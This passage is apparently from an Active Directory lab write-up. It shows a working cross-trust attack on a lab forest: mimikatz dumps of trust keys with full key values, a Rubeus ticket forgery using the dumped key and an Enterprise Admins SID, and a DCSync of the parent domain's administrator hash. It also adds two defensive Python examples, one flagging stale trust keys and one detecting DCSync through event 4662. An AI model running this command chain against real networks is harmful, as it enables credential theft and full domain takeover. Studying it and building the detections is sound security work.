Now let’s start dumping the trust keys.

.\BetterSafetyKatz.exe "lsadump::trust /patch"

As observed, we got the trust keys:

[us-dc]: PS C:\Users\Administrator\Documents> .\SafetyKatz.exe "lsadump::trust /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::trust /patch

Current domain: US.TECHCORP.LOCAL (US / S-1-5-21-210670787-2521448726-163245708)

Domain: TECHCORP.LOCAL (TECHCORP / S-1-5-21-2781415573-3701854478-2406986946)
 [  In ] US.TECHCORP.LOCAL -> TECHCORP.LOCAL
    * 8/3/2024 9:15:55 PM - CLEAR   - 3f 1f 5f 58 09 ab a5 71 a9 c8 dd 9f c9 1c bd 10 12 13 ed 3f af f7 9a 73 54 12 8c 8f 32 e3 b6 22 a1 96 fc 0a 3a b0 c9 15 1c fc 03 0a 94 17 de 9b a6 03 36 0d 69 f4 b3 8c 65 8d 34 a7 39 5a da 43 db 5d 96 69 96 6a cc 13 b8 ce 87 29 73 dd 26 23 2d 68 7e 8e 93 8b 45 96 c7 ef 8e 10 36 45 32 aa cd 1a 31 56 22 97 fa c1 67 c3 2d d5 02 78 9b a0 9a 80 10 e6 7b 0a 51 52 46 61 45 f7 d6 37 91 2a d7 76 5a 7d 47 3d 34 6d 63 de 41 aa 16 f3 80 bf e9 b6 e5 ba ef e9 33 d4 d4 b8 7e b1 1f b6 e5 20 ed a0 b7 73 99 cc cb e7 a2 e6 ed 18 da 24 48 cc d2 48 44 7d b3 e4 86 55 2d d7 02 6d 31 bd 88 20 ea 29 e5 4f b0 70 ae 53 cc 22 1e 9e 6d 12 88 db 91 07 f5 08 39 ac 1f 40 b7 9a 3d 05 45 2d 52 85 5a d2 a5 ef 19 83 18 69 60 21 3d 90 e0 af 5a 6a
        * aes256_hmac       bda73767bb3b8c171ef5e30db8defee77d2dfa79a79c80c2546be3dada08686e
        * aes128_hmac       6c0e955a50d0e07238b4adf7577d13de
        * rc4_hmac_nt       13766b82c578582d8c30707931ac3205

 [ Out ] TECHCORP.LOCAL -> US.TECHCORP.LOCAL
    * 8/3/2024 9:04:42 PM - CLEAR   - 4d 11 82 fa b8 08 92 1d e7 75 e9 38 ba 04 60 03 29 0a 8d 74 ad d1 3f 28 d0 12 90 26 c4 26 c6 4f db d8 6b 3f 17 f7 c2 25 d7 7b d4 64 e6 8d 1c db d0 9b 20 95 a4 be 7b cd eb 6c c8 63 45 5b 72 a8 3d e9 7f c4 98 e2 88 6a 91 0a e5 10 91 d8 cf 63 79 6b fa 6e d8 85 3c 4a 75 01 eb 27 e7 70 ad 24 ad 91 a7 b0 a2 d1 c5 0d 7f 9e 10 7a ae e0 f6 86 9d 7d fe e3 a1 bc 30 91 13 a2 b1 7d 68 ae 12 d0 a7 11 30 1b 27 b4 c5 da a8 3e 00 08 71 b7 19 81 a7 7c 34 99 75 b8 8b 12 78 7d 5c 1a f3 1c cf 13 a0 3b 53 f9 06 42 4d 00 fa dc 20 bf cb eb c2 1b ff 86 85 56 0e 4f d4 8d 1a c3 a8 eb ad c3 47 bd 0a 52 59 d7 e6 32 e9 ff 6a e3 b8 0b df db 23 aa c6 d4 2b 68 f0 4c 6d 27 19 ac 76 ab 55 76 c0 80 c4 57 e5 e5 9e 47 5c 46 0f 1b 8a 51 7c 6c 22 8c
        * aes256_hmac       83bf3baec1d31c65d85e53e2493def63a8d880fcaab2c8216104d207bbe4af2f
        * aes128_hmac       c82460b6bfabaf9d777e49a068981f83
        * rc4_hmac_nt       43633ee7409ac1c8d4c36cdce6d42d1c

 [ In-1] US.TECHCORP.LOCAL -> TECHCORP.LOCAL
    * 7/2/2024 2:23:14 AM - CLEAR   - 1b 7a 9b 2f 25 70 ef cb 1a 80 8a 38 06 86 b1 8e 5d 55 99 20 d6 41 e1 8f 47 4c 61 94 0c 92 e0 35 05 0a 5b 50 8f 8c 34 89 9e dd 80 71 08 b4 d3 ec 62 2c ab 96 bd c0 9c 00 99 00 35 4a b7 c7 42 c2 5d 74 ee 15 1e 4a c1 fc 96 f9 7a fd 82 6b d2 38 41 23 27 a6 6d 3e 8c fe 9c f3 a8 c5 b4 c9 c5 d2 2d 6d 88 53 84 3a 77 9f 99 36 ce dc 9b 11 6c e9 dd ec 6e e9 91 2e 6d 30 42 0e 30 14 d6 3a 99 7b 6c 7a 2c 0f 10 6c cc 87 82 7f 96 04 09 c0 c9 72 2c fc e3 43 dc f2 22 73 cd 4b 37 d2 03 ee 1d b7 42 3d 70 c8 2d ff 4b 94 40 0f 3b 9c 45 2f 9e 23 c3 4e 08 38 62 93 3d 70 d6 1e 33 7b e4 f7 be 41 33 8b 39 70 a4 e2 ab 02 79 d4 2a 1c 33 1c 77 eb bb b6 a1 6d 29 67 4c d8 1c 62 61 b0 01 98 9a de fa 6d a0 f7 7b 81 4a 2f 51 26 7e 15 c8 b9 e0 50
        * aes256_hmac       2c55b0ad2b33d441c445dfe52af1b6fc073af9e75c13b2301f1ddac10291bbe6
        * aes128_hmac       80f118381c2df45328bfa6027449df3e
        * rc4_hmac_nt       b643e817a077f3e6952a096e169c3a90

 [Out-1] TECHCORP.LOCAL -> US.TECHCORP.LOCAL
    * 8/3/2024 9:04:42 PM - CLEAR   - eb 5f b0 45 4b 91 2c ed ed b2 ac e4 88 69 75 40 66 d3 61 e1 83 60 55 59 c1 61 af e7 38 6f 6f 6f eb 89 e5 8b 5f ff 15 ae 1d 85 15 a1 e3 64 4f ce d5 64 b9 9d 7a 93 12 31 cb 56 13 16 9b 6a 53 de cc 42 72 1c 90 a7 bf 47 2a 58 aa b5 a4 0c 6b b8 7d 0b a1 0c 45 21 c4 d9 a5 9a 77 a5 15 fe d9 a2 8b d3 38 3f ec d1 ec f9 05 56 ab aa a4 d7 7a 11 7f 8b 01 af 21 2c 2d 7c 09 a8 f3 ec b1 8b 92 3d a8 d7 ad 84 fa 6a 25 87 af a9 03 a9 61 01 45 e1 27 e4 60 96 dd 4b d0 db 54 c0 45 e8 ef 03 e6 dc 58 c6 e1 0f fd 98 55 b8 01 42 15 54 bb c8 91 a0 6d ad fc 60 5d ff 2a 21 e2 a2 93 0a 9d da 7b 7d b8 cf 1b 38 b3 91 3b 71 e4 1a 37 4c c5 41 91 b3 d7 84 41 00 fe 12 6f fe e3 1a bc 9f 35 cf a6 33 5c ee 0b e0 e6 2f d6 0f ae 9f 98 65 04 a2 b5 54
        * aes256_hmac       c0ce0eeab0dcb212369a38f6a935dd29c20bc11c98f24b14e7419d0b45cad407
        * aes128_hmac       276b93f90146bec6f85d9f78e6ba12ef
        * rc4_hmac_nt       e046fbb5f6bf7b6c1b40cd2d8265d0d3

Domain: EU.LOCAL (EU / S-1-5-21-3657428294-2017276338-1274645009)
 [  In ] US.TECHCORP.LOCAL -> EU.LOCAL
    * 8/3/2024 9:16:04 PM - CLEAR   - db a7 c2 43 45 41 c9 17 c7 5c 27 4f 7d af 9d 87 a9 44 04 b8 68 76 10 ff 62 b7 43 4f e2 c0 c5 35 a3 44 12 33 6a f5 32 22 00 c4 c9 a7 79 13 23 57 3c 35 26 99 6a 56 57 ca 46 21 0f 84 7a 7a 9c fc 78 16 b7 0c 34 6b 7f 6e 16 b9 c8 b7 4e df 16 06 85 ac 57 49 2b 17 c8 74 b5 53 c0 da e5 00 a7 63 9b f6 16 2d a9 bd c3 fa e4 ad 79 18 f8 96 ef 42 0f 2a 21 69 00 13 a1 f1 4b 82 69 37 e9 5a dd 4a 38 28 ef bd 49 bf 01 9c 90 37 f8 68 83 4e 52 67 4e ff ce 3a 7a 9b 01 f2 2d dc 07 8f 7d 11 0d 36 d0 59 ef a3 1d c7 48 d0 4a a8 84 07 2e 32 98 2e 4f eb 73 55 e3 ee 0a 93 60 33 86 0c 17 81 fd 68 f8 b1 cb dd 54 dd a0 60 27 f5 0d c1 4c 25 b0 45 7f e4 ac 85 05 39 88 cf 89 f1 80 e7 e6 a8 0b 92 25 05 c9 79 81 7f 16 0f c2 a1 e1 e2 a1 99 ec 82
        * aes256_hmac       8249f7eb9f5dff56ad607f99dfac1a81eb3729b80786919714e46876302ab9f6
        * aes128_hmac       b486c602ef93eda0389303e555d86206
        * rc4_hmac_nt       358eebe5d44bcde30587c5b6de7f78a2

 [ Out ] EU.LOCAL -> US.TECHCORP.LOCAL
    * 8/3/2024 9:04:44 PM - CLEAR   - 3a 74 12 06 2f 7c 6a 80 75 d0 9a ba b5 dd 32 b5 11 ed dc 83 9e 6c ff a3 ff 4a ea 83 bb 82 66 17 b0 86 4c 5c 8d 75 42 bb a5 1a 45 cf 63 75 9c 26 3b d1 a4 57 78 e3 37 67 69 58 01 6d 23 db e7 68 76 2d 05 ba b0 99 58 d8 54 a0 6a 77 9d 88 d9 d5 79 65 cd 93 82 37 1e 5d cb 83 b1 87 33 fa a8 97 96 d6 e7 b8 92 24 10 62 f8 9c 24 61 e7 fa 29 a7 86 5b e4 6d f5 c1 af c1 48 82 c8 a1 5d 20 ae c7 c1 eb a6 cd 5c a3 6f ba 3f fd 91 6e 85 6e a4 39 2a d3 3a 69 1c 25 81 ba a9 c3 e6 e4 be d8 98 11 9a d8 0d ff 97 02 b6 a3 86 03 7e 3c a2 37 3d 24 e9 fd 28 3b 9b b4 bb cb f5 19 f2 7b ff 15 f4 b3 ee 56 7c 74 c8 df 33 0c a2 38 2a 9d 6f f2 64 0c cf 79 24 20 9d f1 fb 3b 76 fa b1 81 29 2f bc 52 38 41 5f ba da df 63 02 a0 a1 56 05 63 3f 93 af
        * aes256_hmac       7d494967d2a5082aa84bde7652295b1951a37d777ee83673577c30831abba124
        * aes128_hmac       a688680a432cc6db648b90972c5c5323
        * rc4_hmac_nt       f298838cf059d286c0c9aa2ddf8c2c3f

 [ In-1] US.TECHCORP.LOCAL -> EU.LOCAL
    * 7/2/2024 2:23:24 AM - CLEAR   - f9 72 64 10 2f a8 4f cb fa 49 67 ed c0 fa a0 42 ba 2c 34 f9 9a 7f 8b e0 a8 a2 0c 88 79 e5 3b 74 3e 6d ef b1 ac 17 a3 9e 01 74 b6 61 84 19 ed a4 5b ea 63 b6 51 61 e3 47 43 3f 82 8a 8c e0 b1 93 40 1f af fd f9 a0 ff e7 c0 e6 85 8e 23 a5 a9 d6 b9 14 06 4d 68 28 b9 3b e3 f8 1c 9c 06 a2 13 5d 84 84 e1 2a db db 0e 02 18 af 26 75 31 9a 69 99 50 f1 8a aa 49 ac db 57 4c 94 e2 c9 49 53 94 b9 33 a6 f7 fd 2f f5 d8 4d fd 1d 72 fd 81 63 56 da b7 47 91 a5 20 4c ad 8f b6 0e 74 ec cf d4 aa fb fe e3 71 1d 4f 2c ad 30 fe 3c fc 4a 51 ea 26 30 9c 65 7f e8 7e a0 6a 02 ba 56 a8 c1 98 41 cf cc e0 46 d9 34 dd 76 cc b9 7c f2 d6 44 e6 39 52 79 fe 65 48 3f 2b 35 f1 41 01 1c 4e b4 68 75 6a c7 f5 2d 70 6c b8 11 46 84 61 6d 02 bd 4f 46 5d 28
        * aes256_hmac       b9346f46206de34ff0453613a2537a7adfb7efac9b23f5fcebd3be6e89b40e40
        * aes128_hmac       279c54f45d18d622c27cdbac530f4a8c
        * rc4_hmac_nt       d96eb104c123ff496e1e455bd0148244

 [Out-1] EU.LOCAL -> US.TECHCORP.LOCAL
    * 8/3/2024 9:04:44 PM - CLEAR   - 53 6f 40 b6 34 7d 12 32 e4 3b d4 7f ae a6 13 7e f4 e6 9e 94 fb 7a 02 41 a3 41 5f d2 e0 40 a1 b4 55 1d 71 5e fa 04 7c 12 62 01 a2 2a 44 cd b3 27 61 27 7e 23 c4 97 a3 b9 8d 37 1d 96 85 33 79 6b 46 22 51 f5 40 0d a2 70 ec 35 da 1c 0f f7 49 aa 1a 8f 2e 7f ec ef d4 a1 b9 0f 42 74 4b f0 4f a5 39 c5 31 5b d7 66 f9 bf 11 98 dc 7b 2b 97 30 c9 44 2a da a2 18 fe 9c c8 ee dd fc cd 66 fb 16 47 cb f4 ab b8 c6 a0 7f 65 2f d5 55 18 ef b5 19 98 48 c5 07 4f 5c 5e 33 9d 47 c2 cb e1 2d 8c 87 ec 72 d2 26 af be 27 a7 c6 b6 38 f7 80 75 1f 16 e5 b1 15 d3 6e 20 18 03 93 52 d5 25 6b a0 65 cb 05 4d 46 b4 91 91 35 ee 5e 0f fa 04 ca 77 a8 e3 b3 a2 3b 7e 2d a0 e2 79 b2 f6 07 76 e2 1f bb a9 ff 1b 84 9d d6 3b 8d 9c bb ee 5d 1b 7d d1 31 fa 1f
        * aes256_hmac       cf6e0066827faf9bbe43d3a0b11b0554680c5c91058f93e43da5a68003d1e5b2
        * aes128_hmac       7b9221573761629ef7cba586cfecd607
        * rc4_hmac_nt       147e82a078bae9756ff23d301339740f
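
From a defender's side, the useful thing to pull out of a dump like the one above is not the key material but the metadata: which trusts exist, in which direction, which key types are present, and when each key was last changed (Windows rotates trust passwords automatically every 30 days, and the previous key is kept as the `-1` entry). The following is an added example, not part of the original write-up, that parses this output format and flags any current trust key whose age exceeds the rotation interval. The sample text is constructed with shortened, made-up key values; the domain names and SIDs are the ones shown above.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime

# Trust passwords are changed automatically every 30 days by default;
# a current key older than that deserves a look (rotation broken, or a stale trust).
DEFAULT_ROTATION_DAYS = 30

DOMAIN_RE = re.compile(r"^Domain:\s+(\S+)\s+\((\S+)\s+/\s+(S-[\d-]+)\)")
DIR_RE = re.compile(r"^\s*\[\s*(In|Out|In-1|Out-1)\s*\]\s+(\S+)\s+->\s+(\S+)")
DATE_RE = re.compile(r"^\s*\*\s+(\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M)\s+-\s+CLEAR")
KEY_RE = re.compile(r"^\s*\*\s+(aes256_hmac|aes128_hmac|rc4_hmac_nt)\s+([0-9a-f]+)")


@dataclass
class TrustKey:
    domain: str        # trusted/trusting domain this block belongs to
    direction: str     # In, Out, In-1 (previous incoming), Out-1 (previous outgoing)
    source: str
    target: str
    changed: datetime  # timestamp printed on the CLEAR line
    keys: dict = field(default_factory=dict)  # enctype -> hex key


def parse_trust_dump(text):
    """Parse the 'lsadump::trust' text format into TrustKey records."""
    entries = []
    domain = None
    current = None
    for line in text.splitlines():
        m = DOMAIN_RE.match(line)
        if m:
            domain = m.group(1)
            continue
        m = DIR_RE.match(line)
        if m:
            current = TrustKey(domain, m.group(1), m.group(2), m.group(3), None)
            entries.append(current)
            continue
        m = DATE_RE.match(line)
        if m and current is not None:
            current.changed = datetime.strptime(m.group(1), "%m/%d/%Y %I:%M:%S %p")
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            current.keys[m.group(1)] = m.group(2)
    return entries


def stale_trust_keys(entries, now, max_age_days=DEFAULT_ROTATION_DAYS):
    """Return (domain, direction, age_in_days) for current keys older than the rotation interval."""
    findings = []
    for e in entries:
        if e.direction not in ("In", "Out") or e.changed is None:
            continue  # previous (-1) keys are expected to be old
        age = (now - e.changed).days
        if age > max_age_days:
            findings.append((e.domain, e.direction, age))
    return findings


# Constructed sample in the dump's format: shortened CLEAR blobs and made-up hex keys.
SAMPLE = """\
Current domain: US.TECHCORP.LOCAL (US / S-1-5-21-210670787-2521448726-163245708)

Domain: TECHCORP.LOCAL (TECHCORP / S-1-5-21-2781415573-3701854478-2406986946)
 [  In ] US.TECHCORP.LOCAL -> TECHCORP.LOCAL
    * 8/3/2024 9:15:55 PM - CLEAR   - 3f 1f 5f 58 09 ab a5 71
        * aes256_hmac       00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
        * aes128_hmac       00112233445566778899aabbccddeeff
        * rc4_hmac_nt       ffeeddccbbaa99887766554433221100

 [ In-1] US.TECHCORP.LOCAL -> TECHCORP.LOCAL
    * 7/2/2024 2:23:14 AM - CLEAR   - 1b 7a 9b 2f 25 70 ef cb
        * rc4_hmac_nt       0123456789abcdef0123456789abcdef

Domain: EU.LOCAL (EU / S-1-5-21-3657428294-2017276338-1274645009)
 [ Out ] EU.LOCAL -> US.TECHCORP.LOCAL
    * 9/1/2024 8:00:00 AM - CLEAR   - db a7 c2 43 45 41 c9 17
        * aes256_hmac       aabbccddeeff00112233445566778899aabbccddeeff00112233445566778899
        * rc4_hmac_nt       89abcdef0123456789abcdef01234567
"""

# Constructed "now" so the example is deterministic.
NOW = datetime(2024, 9, 10)

if __name__ == "__main__":
    parsed = parse_trust_dump(SAMPLE)
    for e in parsed:
        print(f"{e.domain:16} {e.direction:6} {e.source} -> {e.target} changed {e.changed} keys={sorted(e.keys)}")
    for domain, direction, age in stale_trust_keys(parsed, NOW):
        print(f"STALE: {domain} [{direction}] key is {age} days old")
```

If keys like these have been exposed, the trust password itself has to be reset (`netdom trust` with `/reset`) so that the dumped material stops being valid; the parser above is for confirming afterwards that the current key timestamps actually moved.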

Now let’s forge a silver ticket (service ticket) with the rc4_hmac_nt trust key from the dump above.

.\Rubeus.exe silver /user:Administrator /ldap /service:krbtgt/techcorp.local /rc4:13766b82c578582d8c30707931ac3205 /sids:S-1-5-21-2781415573-3701854478-2406986946-519 /nowrap

Now let’s use that ticket to request a TGS for the LDAP service on techcorp-dc.

.\Rubeus.exe asktgs /user:Administrator /service:ldap/techcorp-dc.techcorp.local /dc:techcorp-dc.techcorp.local /ticket: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 /ptt

We got access to the LDAP service, so we can DCSync the techcorp.local domain.

.\BetterSafetyKatz.exe "lsadump::dcsync /user:techcorp\administrator /domain:techcorp.local" "exit"

And we got the Enterprise Administrator hash.
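
The DCSync step is the one that leaves the clearest trace on the parent DC: it is a directory replication request, and with the Directory Service Access audit subcategory enabled it is logged as event 4662 carrying the replication control-access rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). A legitimate replication comes from another domain controller's machine account; here it comes from a user principal. The following is an added detection example, not part of the original write-up, that runs over constructed 4662 records (plain dicts standing in for parsed event XML) and reports replication rights exercised by anything other than an allowlisted DC account. The GUIDs are the schema's well-known control-access right GUIDs; the event values are made up.

```python
# Well-known control access right GUIDs for directory replication (AD schema).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"

REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES: "DS-Replication-Get-Changes",
    DS_REPLICATION_GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET: "DS-Replication-Get-Changes-In-Filtered-Set",
}


def replication_rights_in(properties):
    """Names of replication rights present in a 4662 'Properties' field (GUID list)."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def is_dcsync_candidate(event, dc_accounts):
    """Return a finding dict if this event is a replication request from a non-DC principal."""
    if event.get("EventID") != 4662:
        return None
    rights = replication_rights_in(event.get("Properties", ""))
    if not rights:
        return None  # some other directory object access
    subject = event.get("SubjectUserName", "")
    # Domain controllers replicate with their machine accounts (NAME$); keep an explicit
    # allowlist rather than trusting the trailing '$', since attackers can create machine accounts.
    if subject.upper() in {a.upper() for a in dc_accounts}:
        return None
    return {
        "time": event.get("TimeCreated"),
        "subject": f"{event.get('SubjectDomainName', '')}\\{subject}",
        "rights": rights,
    }


def detect_dcsync(events, dc_accounts):
    return [f for f in (is_dcsync_candidate(e, dc_accounts) for e in events) if f]


# Constructed allowlist: the DC machine accounts seen in this lab (hostnames from the write-up).
DC_ACCOUNTS = {"US-DC$", "TECHCORP-DC$"}

# Constructed sample events in the shape of parsed 4662 EventData.
SAMPLE_EVENTS = [
    {   # normal inter-DC replication: machine account, on the allowlist -> ignored
        "EventID": 4662, "TimeCreated": "2024-08-03T21:20:11Z",
        "SubjectDomainName": "US", "SubjectUserName": "US-DC$",
        "Properties": "Control Access\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # replication rights exercised by a user principal -> alert
        "EventID": 4662, "TimeCreated": "2024-08-03T21:31:47Z",
        "SubjectDomainName": "TECHCORP", "SubjectUserName": "Administrator",
        "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # unrelated directory access (made-up property GUID) -> ignored
        "EventID": 4662, "TimeCreated": "2024-08-03T21:32:05Z",
        "SubjectDomainName": "TECHCORP", "SubjectUserName": "svc-backup",
        "Properties": "Read Property\n\t{deadbeef-0000-0000-0000-000000000000}",
    },
    {   # not a 4662 at all -> ignored
        "EventID": 4624, "TimeCreated": "2024-08-03T21:33:00Z",
        "SubjectDomainName": "TECHCORP", "SubjectUserName": "Administrator",
    },
]

if __name__ == "__main__":
    for finding in detect_dcsync(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"{finding['time']} DCSync-like replication by {finding['subject']}: {', '.join(finding['rights'])}")
```

Because the write-up's replication request is made under a forged Enterprise Admin identity, the subject name alone looks legitimate; the signal is the combination of replication rights and a non-DC principal. Real deployments need the allowlist to include other principals that replicate by design (for example a directory synchronisation service account), otherwise those generate steady false positives.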